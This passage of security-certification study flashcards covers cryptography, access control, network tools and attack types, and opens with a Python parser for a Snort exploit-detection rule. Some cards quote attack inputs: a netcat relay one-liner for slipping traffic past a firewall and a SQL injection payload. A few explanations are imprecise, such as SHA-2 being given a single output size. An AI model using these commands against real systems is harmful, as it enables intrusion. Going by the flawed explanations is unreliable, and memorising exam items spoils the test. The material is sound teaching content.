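    'msg: "BROWSER-IE Microsoft Internet Explorer CacheSize exploit attempt"; '
    'flow: to_client,established; file_data; content:"recordset"; offset:14; depth:9; '
    'content:".CacheSize"; distance:0; within:100; pcre:"/CacheSize\\s=\\s/"; '
    'byte_test:10,>,0x3ffffffe,0,relative,string; max-detect-ips drop, service http; '
    'reference:cve,2016-8077; classtype: attempted-user; sid:65535;rev:1;'
)

# Header: action proto src_addr src_port direction dst_addr dst_port, then the option body.
HEADER_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<dir>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*(?P<body>.*)$"
)


def parse_rule(rule):
    """Split a Snort-style rule into header fields, key:value options and bare flags."""
    m = HEADER_RE.match(rule.strip())
    if not m:
        raise ValueError("not a Snort-style rule")
    header = {k: m[k] for k in ("action", "proto", "src", "sport", "dir", "dst", "dport")}
    options, flags = {}, []
    # Options are ';'-separated key:value pairs; keywords without a value
    # (file_data) are flags. A naive split is enough here because no quoted
    # value in this rule contains ';'; a full parser must honour quoting.
    for part in m["body"].strip().strip("()").split(";"):
        part = part.strip()
        if not part:
            continue
        if ":" in part:
            key, value = part.split(":", 1)
            options.setdefault(key.strip(), []).append(value.strip().strip('"'))
        else:
            flags.append(part)
    return {**header, "options": options, "flags": flags}


def describe(rule):
    """Protocol, direction relative to the protected network, and whether
    only established sessions are inspected, as read from the rule."""
    r = parse_rule(rule)
    flow = {f.strip() for f in r["options"].get("flow", [""])[0].split(",")}
    inbound = (r["dir"] == "->" and r["dst"] == "$HOME_NET") or "to_client" in flow
    reference = r["options"].get("reference", [""])[0]
    return {
        "action": r["action"],
        "protocol": r["proto"],
        "inbound": inbound,
        "established_only": "established" in flow,
        "cve": reference.split(",", 1)[-1],
        "sid": int(r["options"]["sid"][0]),
    }


if __name__ == "__main__":
    print(describe(RULE))
```

$HOME_NET and $EXTERNAL_NET are variables resolved from the sensor's configuration, so "inbound" here means "toward whatever the sensor has been told is the protected network"; the same rule text is neutral about which physical interface the traffic arrives on.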

143
Q

Which of the following cryptographic algorithms is classified as symmetric?

DSA
ECC
GPG
DES

A

DES

OBJ-6.2: The Data Encryption Standard (DES) is a symmetric-key algorithm for the encryption of digital data. Although its short key length of 56 bits makes it too insecure for modern applications, it was the standard from 1977 until the early 2000s. GPG (GNU Privacy Guard, an OpenPGP implementation whose key management and signatures rely on public-key algorithms), ECC, and DSA are all classified as asymmetric.

144
Q

You have just finished running an nmap scan on a server and see the following output:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# nmap diontraining.com
Starting Nmap ( http://nmap.org )
Nmap scan report for diontraining.com (64.13.134.52)
Not shown: 996 filtered ports
PORT     STATE
22/tcp   open
23/tcp   open
53/tcp   open
443/tcp  open
Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on the output above, which of the following ports listed as open represents the most significant security vulnerability to your network?

22
23
53
443

A

23

OBJ-2.2: Port 23 is used by telnet and is not considered secure because it sends all of its data in cleartext, including authentication data such as usernames and passwords. As an analyst, you should recommend that telnet be disabled and blocked from use, with SSH used for remote administration instead. The other open ports are for SSH (port 22), DNS (port 53), and HTTPS (port 443).

145
Q

Which of the following categories would contain information about a French citizen’s race or ethnic origin?

DLP
SPI
PII
PHI

A

SPI

OBJ-5.8: According to the GDPR, information about an individual’s race or ethnic origin is classified as Sensitive Personal Information (SPI). Sensitive personal information (SPI) is information about a subject’s opinions, beliefs, and nature that is afforded specially protected status by privacy legislation. As it cannot be used to uniquely identify somebody, or make any relevant assertions about health, it is neither PII nor PHI. Data loss prevention (DLP) is a software solution that detects and prevents sensitive information from being stored on unauthorized systems or transmitted over unauthorized networks.

146
Q

Ryan needs to verify the installation of a critical Windows patch on his organization’s workstations. Which method would be the most efficient to validate the current patch status for all of the organization’s Windows 10 workstations?

Use SCCM to validate patch status for each machine on the domain

Conduct a registry scan of each workstation to validate the patch was installed

Check the Update History manually

Create and run a PowerShell script to search for the specific patch in question

A

Use SCCM to validate patch status for each machine on the domain

OBJ-2.4: Microsoft System Center Configuration Manager (SCCM) provides remote control, patch management, software distribution, operating system deployment, network access protection, and hardware and software inventory. In an Azure environment, you can also use the Update Compliance tool to monitor your devices' Windows updates, Windows Defender anti-virus status, and overall patching status across all of your Windows 10 workstations. In earlier versions of Windows you could use the Microsoft Baseline Security Analyzer (MBSA), but it is not supported on Windows 10. A PowerShell script may be a reasonable option, but it would take a knowledgeable analyst to create the script and scan the network, whereas using SCCM is easier and quicker. Manually checking the Update History or registry of each system could also work, but that is very time consuming and inefficient, especially if Ryan is supporting a large network.

147
Q

Which of the following access control methods provides the most detailed and explicit type of access control over a resource?

MAC
RBAC
DAC
ABAC

A

ABAC

OBJ-4.3: Attribute-based access control (ABAC) provides the most detailed and explicit type of access control over a resource because it makes access decisions based on a combination of subject and object attributes as well as context-sensitive or system-wide attributes. Information such as group membership, the operating system the user is running, the time of day, and even the IP address of the requesting machine can all be evaluated when granting or denying access.
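
An added example (not part of the card) of how an ABAC decision differs from a role-only decision: a small Python policy evaluator with constructed subject, object and context attributes. The group name, network range, approved OS list and working hours are made up for the illustration.

```python
from ipaddress import ip_address, ip_network

# Constructed policy for illustration. Each condition is a predicate over
# (subject, object, context); new attributes become new predicates, the
# decision engine itself does not change.
CORP_NET = ip_network("10.0.0.0/8")
APPROVED_OS = {"Windows 11", "macOS 14"}

POLICIES = [
    {
        "name": "payroll-read",
        "resource": "payroll-db",
        "action": "read",
        "conditions": [
            lambda s, o, c: o["owner_group"] in s["groups"],        # subject vs. object
            lambda s, o, c: ip_address(c["src_ip"]) in CORP_NET,      # context: source network
            lambda s, o, c: c["os"] in APPROVED_OS,                   # context: device posture
            lambda s, o, c: 8 <= c["hour"] < 19,                      # context: time of day
        ],
    },
]

# Constructed object.
PAYROLL = {"id": "payroll-db", "owner_group": "finance"}


def abac_decide(subject, obj, action, context, policies=POLICIES):
    """Permit only if some policy for this resource and action has every
    condition true; anything else is denied (default deny)."""
    for policy in policies:
        if policy["resource"] != obj["id"] or policy["action"] != action:
            continue
        if all(cond(subject, obj, context) for cond in policy["conditions"]):
            return "permit"
    return "deny"


def rbac_decide(subject, obj, action):
    """Group membership alone, for contrast: the answer is the same no
    matter where, when or from what device the request is made."""
    return "permit" if obj["owner_group"] in subject["groups"] else "deny"


if __name__ == "__main__":
    alice = {"name": "alice", "groups": {"finance"}}
    office = {"src_ip": "10.2.3.4", "os": "Windows 11", "hour": 10}
    cafe = {"src_ip": "203.0.113.9", "os": "Windows 11", "hour": 10}
    print("office:", abac_decide(alice, PAYROLL, "read", office))
    print("cafe:  ", abac_decide(alice, PAYROLL, "read", cafe))
    print("rbac:  ", rbac_decide(alice, PAYROLL, "read"))
```

The contrast shows why ABAC is the most granular of the four models: the same finance user is permitted from a managed machine on the corporate network during working hours and denied from an unknown network, even though her role never changed. The price is that the attributes must be reliable; a decision based on a spoofable attribute is no stronger than the spoof.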

148
Q

You need to determine the best way to test operating system patches in a lab environment prior to deploying them to your automated patch management system. Unfortunately, your network has several different operating systems in use, but you only have one machine available to test the patches on. What is the best environment to utilize to perform the testing of the patches prior to deployment?

Bypass testing and deploy patches directly into the production environment
Purchase additional workstations
Sandboxing
Virtualization

A

Virtualization

OBJ-3.3: When you have limited hardware but are required to test against multiple operating systems, set up a virtualized environment and test the patch in a virtual machine running each operating system before deployment. Never deploy patches directly into production without first testing them in the lab.

149
Q

Which technique would provide the largest increase in security on a network with ICS, SCADA, or IoT devices?

Implement endpoint protection platforms
User and entity behavior analytics
Installation of anti-virus tools
Use of a host-based IDS or IPS

A

User and entity behavior analytics

OBJ-3.5: Since ICS, SCADA, and IoT devices often run proprietary, inaccessible, or unpatchable operating systems, the traditional tools used to detect the presence of malicious cyber activity in normal enterprise networks will not function properly. Therefore, the use of user and entity behavior analytics (UEBA) is best suited to detect and classify known-good behavior from these systems to create a baseline. Once a known-good baseline is established, deviations can be detected and analyzed. UEBA may be heavily dependent on advanced computing techniques like artificial intelligence and machine learning, and may have a higher false positive rate. As the name suggests, the analytics software tracks user account behavior across different devices and cloud services. Entity refers to machine accounts, such as client workstations or virtualized server instances, and to embedded hardware, such as Internet of Things (IoT) devices. Traditional technologies include anti-virus tools, host-based IDS and IPS, and endpoint protection platforms.

150
Q

Which of the following access control models is the most flexible and allows the owner of the resource to control the access permissions?

RBAC
ABAC
DAC
MAC

A

DAC

OBJ-4.3: Discretionary access control (DAC) stresses the importance of the owner. The original creator of a resource is its owner and can assign permissions, and ownership itself, to others. The owner has full control over the resource and can modify its ACL to grant rights to others. This is the most flexible model and is the one implemented by default in the file systems of Windows, Unix, Linux, and macOS.

151
Q

An attacker has issued the following command: nc -l -p 8080 | nc 192.168.1.76 443. Based on this command, what will occur?

Netcat will listen for a connection from 192.168.1.76 on port 443 and output anything received to port 8080

Netcat will listen on the 192.168.1.76 interface for 443 seconds on port 8080

Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443

Netcat will listen on port 8080 and then output anything received to local interface 192.168.1.76

A

Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443

OBJ-2.2: In netcat (nc), -l puts it into listen mode and -p sets the listening port, so the first command waits for a connection on local port 8080. The | character pipes whatever the first netcat receives into the standard input of the second netcat, which connects out to 192.168.1.76 on port 443 and sends that data along. The result is a one-way relay from local port 8080 to the remote host. This is a common technique for slipping traffic past a firewall, because outbound port 443 (normally HTTPS) is almost always permitted; note that the data is not actually protected by SSL/TLS, it is simply sent on the port that HTTPS uses.

152
Q

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URLs:

https://test.diontraining.com/profile.php?userid=1546
https://test.diontraining.com/profile.php?userid=5482
https://test.diontraining.com/profile.php?userid=3618

What type of vulnerability does this website have?

Improper error handling
Weak or default configurations
Insecure direct object reference
Race condition

A

Insecure direct object reference

OBJ-1.2: Insecure direct object references (IDOR) are a cybersecurity issue that occurs when a web application developer uses an identifier for direct access to an internal implementation object but provides no additional access control and/or authorization checks. In this scenario, an attacker could simply change the userid number and directly access any user’s profile page. A race condition is a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer. Weak or default configurations are commonly a result of incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information. Improper handling of errors can reveal implementation details that should never be revealed, such as detailed information that can provide hackers important clues on potential flaws in the system.

153
Q

Which of the following functions is not provided by a TPM?

Binding
Remote attestation
User authentication
Sealing
Secure generation of cryptographic keys
Random number generation

A

User authentication

OBJ-3.3: User authentication is performed at a much higher level in the operating system. Trusted Platform Module (TPM) technology is designed to provide hardware-based, security-related functions. A TPM chip is a secure crypto-processor that is designed to carry out cryptographic operations. The chip includes multiple physical security mechanisms to make it tamper-resistant, and malicious software is unable to tamper with the security functions of the TPM. The TPM provides random number generation, secure generation of cryptographic keys, remote attestation, binding, and sealing functions securely.

154
Q

Which security control would prevent unauthorized users from connecting to a company’s wireless network?

Firewall
Segmentation
NAC
IPS

A

NAC

OBJ-2.1: Network Access Control (NAC) prevents unauthorized users from connecting to a network. Firewalls and intrusion prevention systems (IPS) are meant to restrict access from external sources and block known attacks. They would not keep out an intruder who is already in range of the wireless network. Network segmentation would limit the access that an intruder has to network resources but would not block the connection itself.

155
Q

Which of the following cryptographic algorithms is classified as symmetric?

ECC
Diffie-Hellman
RSA
RC4

A

RC4

OBJ-6.2: RC4, or Rivest Cipher 4, is a symmetric stream cipher that was used in WEP and TLS. ECC, RSA, and Diffie-Hellman are all asymmetric algorithms.

156
Q

You are troubleshooting an issue with a Windows desktop and need to display the active TCP connections on the machine. Which of the following commands should you use?

netstat
ping
ipconfig
net use

A

netstat

OBJ-2.2: The netstat command is used to display active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics (for the IP, ICMP, TCP, and UDP protocols), and IPv6 statistics (for the IPv6, ICMPv6, TCP over IPv6, and UDP over IPv6 protocols) on a Windows machine. This is a useful command when trying to determine if any malware has been installed on the system and may be maintaining a remote connection with a command and control server.

157
Q

Which of the following cryptographic algorithms is classified as symmetric?

RSA
AES
Diffie-Hellman
ECC

A

AES

OBJ-6.2: The Advanced Encryption Standard (AES) is a symmetric block cipher with a fixed block size of 128 bits. It can utilize a 128-bit, 192-bit, or 256-bit symmetric key. RSA, Diffie-Hellman, and ECC are all asymmetric algorithms.

158
Q

Sarah is working at a startup that is focused on making secure banking apps for smartphones. Her company needs to select an asymmetric encryption algorithm to encrypt the data being used by the app. Due to the need for high security of the banking data, the company needs to ensure that whatever encryption they use is considered strong, but they also need to minimize the processing power required since it will be running on a mobile device.

ECC
RSA
Diffie-Hellman
Twofish

A

ECC

OBJ-6.2: Elliptic curve cryptography (ECC) is an approach to public-key cryptography based on the algebraic structure of elliptic curves over finite fields. One of the main benefits of ECC over non-ECC cryptography is that an application can achieve the same level of security provided by non-ECC cryptography while using a shorter key length. For example, an ECC algorithm using a 256-bit key length is just as strong as an RSA or Diffie-Hellman algorithm using a 3072-bit key length.

159
Q

Which of the following hashing algorithms results in a 160-bit fixed output?

SHA-2
NTLM
SHA-1
MD-5

A

SHA-1

OBJ-6.2: SHA-1 creates a 160-bit fixed output. SHA-2 creates a 256-bit fixed output. NTLM creates a 128-bit fixed output. MD-5 creates a 128-bit fixed output.

160
Q

What sanitization technique uses only logical techniques to remove data, such as overwriting a hard drive with a random series of ones and zeroes?

Degauss
Clear
Destroy
Purge

A

Clear

OBJ-5.8: Clear applies logical techniques to sanitize data in all user-addressable storage locations for protection against simple non-invasive data recovery techniques. Clearing involves overwriting data once (and seldom more than three times) with repetitive data (such as all zeros) or resetting a device to factory settings. Purging data is meant to eliminate information from being feasibly recovered even in a laboratory environment. Destroy requires physical destruction of the media, such as pulverization, melting, incineration, and disintegration. Degaussing is the process of decreasing or eliminating a remnant magnetic field. Degaussing is an effective method of sanitization for magnetic media, such as hard drives and floppy disks.

161
Q

An attacker is searching in Google for Cisco VPN configuration files by using the filetype:pcf modifier. The attacker was able to locate several of these configuration files and now wants to decode any connectivity passwords that they might contain. What tool should the attacker use?

Netcat
Nessus
Cain and Abel
Nmap

A

Cain and Abel

OBJ-2.2: Cain and Abel is a popular password cracking tool. It can recover many kinds of passwords using methods such as network packet sniffing and can crack various password hashes using dictionary attacks, brute force, and cryptanalysis attacks. It also includes a module to conduct Cisco VPN Client password decoding. CUPP is used to create password lists. Nessus is a vulnerability scanner. The netcat tool is used to create reverse shells for remote access.

162
Q

Which operating system feature is designed to detect malware that is loaded early in the system startup process or before the operating system can load itself?

Startup Control
Advanced anti-malware
Measured boot
Master Boot Record analytics

A

Measured boot

OBJ-3.3: Measured boot is a feature where a log of all boot actions is taken and stored in a trusted platform module for later retrieval and analysis by anti-malware software on a remote server. Master boot record analysis is used to capture the required information of the hard disk to support a forensic investigation and would not detect malware during the system’s boot-up process. Startup control would be used to determine which programs will be loaded when the operating system is initially booted, but this would be too late to detect malware loaded during the pre-startup and boot process. Advanced anti-malware solutions are programs that are loaded within the operating system. Therefore, they are loaded too late in the startup process to be effective against malicious boot sector viruses and other BIOS/UEFI malware variants.

163
Q

A supplier needs to connect several laptops to an organization’s network as part of their service agreement. These laptops will be operated and maintained by the supplier. Victor, a cybersecurity analyst for the organization, is concerned that these laptops could potentially contain some vulnerabilities that could weaken the security posture of the network. What can Victor do to mitigate the risk to other devices on the network without having direct administrative access to the supplier’s laptops?

Implement a jumpbox system

Scan the laptops for vulnerabilities and patch them

Increase the encryption level of VPN used by the laptops

Require 2FA (two-factor authentication) on the laptops

A

Implement a jumpbox system

OBJ-3.2: A jumpbox is a system on a network used to access and manage devices in a separate security zone. This would create network segmentation between the supplier’s laptops and the rest of the network to minimize the risk. A jumpbox system is a hardened and monitored device that spans two dissimilar security zones and provides a controlled means of access between them. While the other options listed are all good security practices, they do not fully mitigate the risk that insecure systems pose, since Victor cannot enforce these configurations on a supplier-provided laptop. Instead, he must find a method of segmenting the laptops from the rest of the network, either physically, logically, using an airgap, or using a jumpbox.

164
Q

Which of the following types of access control provides the strongest level of protection?

ABAC
RBAC
DAC
MAC

A

MAC

OBJ-4.3: Mandatory Access Control (MAC) requires all access to be predefined based on system classification, configuration, and authentication. MAC is commonly used in highly centralized environments and usually relies on a series of labels, such as classification levels of the data.

165
Q

You are reviewing the IDS logs and notice the following log entry:

(where email=support@diontraining.com and password=‘ or 7==7’)

What type of attack is being performed?

XML injection
Cross-site scripting
SQL injection
Header manipulation

A

SQL injection

OBJ-1.2: SQL injection is a code injection technique that is used to attack data-driven applications. SQL injections are conducted by inserting malicious SQL statements into an entry field for execution. For example, an attacker may try to dump the contents of the database by using this technique. A common technique in SQL injection is to insert a statement that is always true, such as 1 == 1, or in this example, 7 == 7. Header manipulation is the insertion of malicious data, which has not been validated, into an HTTP response header. XML Injection is an attack technique used to manipulate or compromise the logic of an XML application or service. The injection of unintended XML content and/or structures into an XML message can alter the intended logic of the application. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user.

166
Q

Which of the following cryptographic algorithms is classified as a stream cipher?

RC4
Blowfish
DES
AES

A

RC4

OBJ-6.2: RC4, or Rivest Cipher 4, is a symmetric stream cipher that was used in WEP and TLS. AES, Blowfish, and DES are all block ciphers.

167
Q

A financial services company wants to donate some old hard drives from their servers to a local charity, but they are concerned about the possibility of residual data being left on the drives. Which of the following secure disposal methods would you recommend the company use?

Cryptographic erase
Overwrite
Secure erase
Zero-fill

A

Cryptographic erase

OBJ-3.3: In a cryptographic erase (CE), the storage media is encrypted by default. The encryption key itself is destroyed during the erasing operation. CE is a feature of self-encrypting drives (SED) and is often used with solid-state devices. Cryptographic erase can be used with hard drives, as well. Zero-fill is a process that fills the entire storage device with zeroes. For SSDs and hybrid drives, zero-fill-based methods might not be reliable because the device uses wear-leveling routines in the drive controller to communicate which locations are available for use to any software process accessing the device. A secure erase is a special utility provided with some solid-state drives that can perform the sanitization of flash-based devices. Overwrite is like zero-fill but can utilize a random pattern of ones and zeroes on the storage device. The most secure option would be a cryptographic erase (CE) for the scenario provided in the question.

168
Q

You have been hired to perform a web application security test. During the test, you notice that the site is dynamic and, therefore, must be using a backend database. You decide you want to test to determine if the site is susceptible to a SQL injection. What is the first character that you should attempt to use in breaking a valid SQL request?

Semicolon
Double quote
Single quote
Exclamation mark

A

Single quote

OBJ-1.2: The single quote character (‘) is used because it is the string delimiter in SQL. With a single quote you delimit strings, and therefore you can test whether the strings are properly escaped in the targeted application or not. If they are not escaped directly, you can end any string supplied to the application and add other SQL code after that, which is a common technique for SQL injections. A semicolon is a commonly used character at the end of a line of code or command in many programming languages. An exclamation mark is often used to comment a line of code in several languages. Double quotes are often used to contain a string being passed to a variable.

169
Q

Which of the following identity and access management controls relies upon using a certificate-based authentication mechanism?

HOTP
TOTP
Proximity card
Smart card

A

Smart card

OBJ-4.3: Smart cards, PIV, and CAC devices are used as an identity and access management control. These devices contain a digital certificate embedded within the smart card (PIV/CAC) that is presented to the system when it is inserted into the smart card reader. When combined with a PIN, the smart card can be used as a multi-factor authentication mechanism. The PIN unlocks the card and allows the digital certificate to be presented to the system.

170
Q

[Diagram: an Attacker sends multiple ICMP Echo Request messages across the Internet to a Server]

Based on the image provided, what type of attack is occurring?

SYN flood
DDoS
Ping flood
Smurf attack

A

Ping flood

OBJ-1.2: A ping flood occurs when an attacker attempts to flood the server by sending too many ICMP echo request packets (which are known as pings).

171
Q

An organization is conducting a cybersecurity training exercise. Which team is Jason assigned if he has been asked to monitor and manage the technical environment that is being used by the defenders and attackers during the exercise?

Red team
Blue team
Purple team
White team

A

White team

OBJ-5.4: Jason is assigned to the white team. The white team acts as the judges, enforces the rules of the exercise, observes the exercise, scores teams, resolves any problems that may arise, handles all requests for information or questions, and ensures that the competition runs fairly and does not cause operational problems for the defender’s mission. A red team is a group of people authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s security posture. A blue team is a group of people responsible for defending an enterprise’s use of information systems by maintaining its security posture against a group of mock attackers. The purple team is made up of members of both the blue and red teams, who work together to maximize their cyber capabilities through continuous feedback and knowledge transfer between attackers and defenders.

172
Q

What tool can be used to scan a network to perform vulnerability checks and compliance auditing?

Metasploit
BeEF
Nessus
Nmap

A

Nessus

OBJ-2.2: Nessus is a very popular vulnerability scanner. It can be used to check how vulnerable your network is by using various plugins to test for vulnerabilities. Also, Nessus can be used to perform compliance auditing, like internal and external PCI DSS audit scans. The nmap tool is a port scanner. The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

173
Q

Available features:
Network sniffer
Cable lock
Cellular data
Host-based firewall
Location tracking
CAT 5e STP
MDM
Remote wipe

Select the four security features that you should use with a smartphone provided through a COPE policy in your organization.

Remote wipe, Location tracking, Host-based firewall, Cable lock

Cable lock, Network sniffer, Cellular data, Remote wipe

MDM, Location tracking, Host-based firewall, Remote wipe

Cellular data, Remote wipe, Location tracking, MDM

A

Cellular data, Remote wipe, Location tracking, MDM

OBJ-2.5: Cellular data, Remote wipe, Location tracking, and MDM are all appropriate security features to use with a company-provided laptop. By using cellular data, your users will be able to avoid connecting to WiFi networks for connectivity. Remote wipe enables the organization to remotely erase the contents of the device if it is lost or stolen. Location tracking uses the smartphone’s GPS coordinates for certain apps, location-based authentication, and to track down a device if it is lost or stolen. A mobile device management (MDM) program enables the administrators to remotely push software updates, security policies, and other security features to the device from a centralized server.

174
Q

You are troubleshooting a network connectivity issue and need to determine the packet’s flow path from your system to the remote server. Which of the following tools would best help you identify the path between the two systems?

nbtstat
tracert
ipconfig
netstat

A

tracert

OBJ-2.2: The TRACERT (spoken out loud as trace route) diagnostic utility determines the route to a destination by sending Internet Control Message Protocol (ICMP) echo packets to the destination. In these packets, TRACERT uses varying IP Time-To-Live (TTL) values. When the TTL on a packet reaches zero (0), the router sends an ICMP “Time Exceeded” message back to the source computer. The ICMP “Time Exceeded” messages that intermediate routers send back show the route. The ipconfig tool displays all current TCP/IP network configuration values on a given system. The netstat tool is a command-line network utility that displays network connections for Transmission Control Protocol, routing tables, and a number of network interface and network protocol statistics on a single system. The nbtstat command is a diagnostic tool for NetBIOS over TCP/IP used to troubleshoot NetBIOS name resolution problems.

175
Q

Which party in a federation provides services to members of the federation?

RP
SAML
SSO
IdP

A

RP

OBJ-4.2: Relying parties (RPs) provide services to members of a federation. An identity provider (IdP) provides identities, makes assertions about those identities, and releases information about the identity holders. The Security Assertion Markup Language (SAML) is an open standard for exchanging authentication and authorization data between parties, such as between an identity provider and a service provider (SP) or relying party (RP). Single sign-on (SSO) is an authentication scheme that allows a user to log in with a single ID and password to any of several related yet independent software systems across a federation. SAML and SSO are not parties. Therefore, they cannot possibly be the right answer to this question.

176
Q

A cybersecurity analyst is applying for a new job with a penetration testing firm. He received the job application as a secured Adobe PDF file, but unfortunately, the firm locked the file with a password so the potential employee cannot fill in the application. Instead of asking for an unlocked copy of the document, the analyst decides to write a script in Python to attempt to unlock the PDF file by using passwords from a list of commonly used passwords until he can find the correct password or attempts every password in his list. Based on this description, what kind of cryptographic attack did the analyst perform?

Brute-force attack
Man-in-the-middle attack
Dictionary attack
Session hijacking

A

Dictionary attack

OBJ-1.2: A dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying hundreds or sometimes millions of likely possibilities, such as words in a dictionary. The key to answering this question is that they were using passwords from a list. In cryptography, a brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. A dictionary attack is a specific form of a brute-force attack that uses a list. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the webserver. A man-in-the-middle attack (MITM), also known as a hijack attack, is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other.

177
Q

You are conducting an incident response and have traced the source of the attack to some compromised user credentials. After performing log analysis, you discover that the attack was successfully authenticated from an unauthorized foreign country. Your management is now asking for you to implement a solution to help mitigate this type of attack from occurring again. Which of the following should you implement?

Context-based authentication
Single sign-on
Self-service password reset
Password complexity

A

Context-based authentication

OBJ-4.1: Context-based authentication can take a number of factors into consideration before permitting access to a user, including their location (e.g., country, GPS location, etc.), the time of day, and other key factors, to minimize the threat of compromised credentials being utilized by an attacker. A self-service password reset is defined as any process or technology that allows users who have either forgotten their password or triggered an intruder lockout to authenticate with an alternate factor and repair their own problem without calling the help desk. While helpful, this alone would not help prevent an attacker from using the compromised credentials. Single sign-on (SSO) is an authentication scheme that allows a user to log in with a single ID and password to any of several related yet independent software systems. Again, this is helpful since it will minimize the number of usernames and passwords that a user must remember, but if their credentials are stolen, then the attacker can now access every system the user had access to, extending the problem. Password complexity is also a good thing to use, but it won’t address the challenge presented in the question of how to prevent the use of compromised credentials. If the password complexity is increased, this will prevent a brute force credential compromise, but if the credentials are compromised any other way, then the attacker could still log in to our systems and cause trouble for us.

178
Q

You are working as part of a penetration testing team during an assessment of Dion Training’s headquarters. Your boss has requested that you search the recycle bins of the company for any information that might be valuable during the reconnaissance phase of your attack. What type of social engineering method are you performing?

Whaling
Dumpster diving
Phishing
Impersonation

A

Dumpster diving

OBJ-1.2: Dumpster diving involves searching through publicly accessible garbage cans or recycling bins to find discarded paper, manuals, or other valuable types of information from a targeted company. This is often done as part of the reconnaissance phase before an attack is performed.

179
Q

Every new employee at Dion Training must sign a document to show they understand the proper rules for using the company’s computers. This document states that the new employee has read the policy that dictates what can and cannot be done from the corporate workstations. Which of the following documents BEST describes this policy?

AUP
SOW
MOU
SLA

A

AUP

OBJ-5.1: An acceptable use policy (AUP) is a document stipulating constraints and practices that a user must agree to for access to a corporate network or the internet. For example, it may state that they must not attempt to break the security of any computer network or user, or that they cannot visit pornographic websites from their work computer.

180
Q

Dion Training’s offices utilize an open concept floor plan. They are concerned that a visitor might attempt to steal an external hard drive and carry it out of the building. To mitigate this risk, the security department has recommended installing security cameras that are clearly visible to both employees and visitors. What type of security control do these cameras represent?

Administrative
Deterrent
Compensating
Corrective

A

Deterrent

OBJ-3.9: A deterrent control is designed to discourage the violation of a security policy. Since the cameras are clearly visible, they are acting as a deterrent control. A corrective control is one that is used to fix or eliminate a vulnerability. A compensating control is used to minimize a vulnerability when it is deemed too difficult or impractical to fully correct the vulnerability. An administrative control is used to create a policy or procedure to minimize or eliminate a vulnerability.

181
Q

You just received a notification that your company’s email servers have been blacklisted due to reports of spam originating from your domain. What information do you need to start investigating the source of the spam emails?

The SMTP audit log from your company’s email server

The full email header from one of the spam messages

Firewall logs showing the SMTP connections

Network flows for the DMZ containing the email servers

A

The full email header from one of the spam messages

OBJ-1.2: You should first request a copy of one of the spam messages that include the full email header. By reading through the full headers of one of the messages, you can determine where the email originated from, whether it was from your email system or if it was external, and if it was a spoofed email or a legitimate email. Once this information has been analyzed, you can then continue your analysis further based on those findings, whether that be analyzing your email server, the firewalls, or other areas of concern. If enough information cannot be found by analyzing the email headers, then you will need to conduct more research to determine the best method to solve the underlying problem.

182
Q

Which of the following tools is useful for capturing Windows memory data for forensic analysis?

Nessus
dd
Memdump
Wireshark

A

Memdump

OBJ-2.2: Memdump is a memory capture tool for forensic use. The dd tool is used to conduct forensic disk images. Wireshark is used for packet capture and analysis. Nessus is a commonly used vulnerability scanner.

183
Q

Which law requires that government agencies and other organizations that operate systems on behalf of government agencies comply with security standards?

SOX
COPPA
FISMA
HIPAA

A

FISMA

OBJ-5.8: The Federal Information Security Management Act (FISMA) is a United States federal law that defines a comprehensive framework to protect government information, operations, and assets against natural or man-made threats. FISMA requires that government agencies and other organizations that operate systems on behalf of government agencies comply with security standards. The Health Insurance Portability and Accountability Act (HIPAA) is a United States federal law designed to provide privacy standards to protect patients’ medical records and other health information provided to health plans, doctors, hospitals, and other health care providers. The Children’s Online Privacy Protection Act (COPPA) is a United States federal law that imposes certain requirements on operators of websites or online services directed to children under 13 years of age, and on operators of other websites or online services that have actual knowledge that they are collecting personal information online from a child under 13 years of age. Sarbanes–Oxley (SOX) is a United States federal law that set new or expanded requirements for all U.S. public company boards, management, and public accounting firms.

184
Q

Which attack method is MOST likely to be used by a malicious employee or insider who is trying to obtain another user’s passwords?

Tailgating
Man-in-the-middle
Shoulder surfing
Phishing

A

Shoulder surfing

OBJ-1.2: While all of the methods listed could be used by a malicious employee or insider to obtain another user’s passwords, shoulder surfing is the MOST likely to be used. Shoulder surfing is a type of social engineering technique used to obtain information such as personal identification numbers (PINs), passwords, and other confidential data by looking over the victim’s shoulder. Since a malicious employee or insider can work in close proximity to their victims (other users), they could easily use this technique to collect the passwords of the victimized users.

185
Q

Which of the following technologies is NOT a shared authentication protocol?

OAuth
Facebook Connect
LDAP
OpenID Connect

A

LDAP

OBJ-4.2: LDAP can be used for single sign-on but is not a shared authentication protocol. OpenID, OAuth, and Facebook Connect are all shared authentication protocols. OpenID Connect (OIDC) is an authentication protocol that can be implemented as special types of OAuth flows with precisely defined token fields. OAuth is designed to facilitate the sharing of information (resources) within a user profile between sites.

186
Q

Your firewall is blocking outbound email traffic that is attempting to be sent. Which port should you verify is set to ALLOW in the firewall to ensure your emails are being sent?

80
25
143
22

A

25

